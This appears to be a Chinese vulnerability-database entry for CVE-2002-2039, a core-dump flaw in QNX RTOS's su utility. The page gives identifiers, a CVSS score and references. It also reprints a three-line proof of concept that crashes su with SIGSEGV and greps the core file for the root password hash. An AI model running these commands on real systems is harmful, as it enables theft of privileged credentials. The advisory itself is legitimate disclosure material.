QNX RTOS su密码哈希泄露漏洞

QNX RTOS su密码哈希泄露漏洞

漏洞ID 1106765 漏洞类型 未知
发布时间 2002-06-03 更新时间 2005-10-20
图片[1]-QNX RTOS su密码哈希泄露漏洞-安全小百科CVE编号 CVE-2002-2039
图片[2]-QNX RTOS su密码哈希泄露漏洞-安全小百科CNNVD-ID CNNVD-200212-374
漏洞平台 Linux CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/21502
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-374
|漏洞详情
QNXrealtimeoperatingsystem(RTOS)4.25和6.1.0的/bin/su存在漏洞。本地用户可以通过发送SIGSERV(无效存储器参量)信号获取核心转储文件的敏感信息。
|漏洞EXP
source: http://www.securityfocus.com/bid/4914/info

It has been reported that the 'su' utility for QNX RTOS accepts the SIGSEGV signal and dumps a world readable core file. An attacker is able to analyze the core file and obtain very sensitive information.

It is very probable that this is a kernel-based vulnerability affecting not only 'su', but other setuid programs as well 

$su > /dev/null &
$kill -SEGV `ps -A | grep su | awk {'print $1'}`
$strings /var/dumps/su.core | grep ":0:0" > /tmp/mypasswd

The attacker has effectively obtained a copy of the root user's password hash.
|参考资料

来源:BUGTRAQ
名称:20020603QNX
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=102312549511726&w;=2
来源:BID
名称:4914
链接:http://www.securityfocus.com/bid/4914
来源:XF
名称:qnx-rtos-su-core-dump(9256)
链接:http://www.iss.net/security_center/static/9256.php

相关推荐: VP-ASP Shopproductselect.ASP SQL Injection Vulnerability

VP-ASP Shopproductselect.ASP SQL Injection Vulnerability 漏洞ID 1096308 漏洞类型 Input Validation Error 发布时间 2005-07-18 更新时间 2005-07-18 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享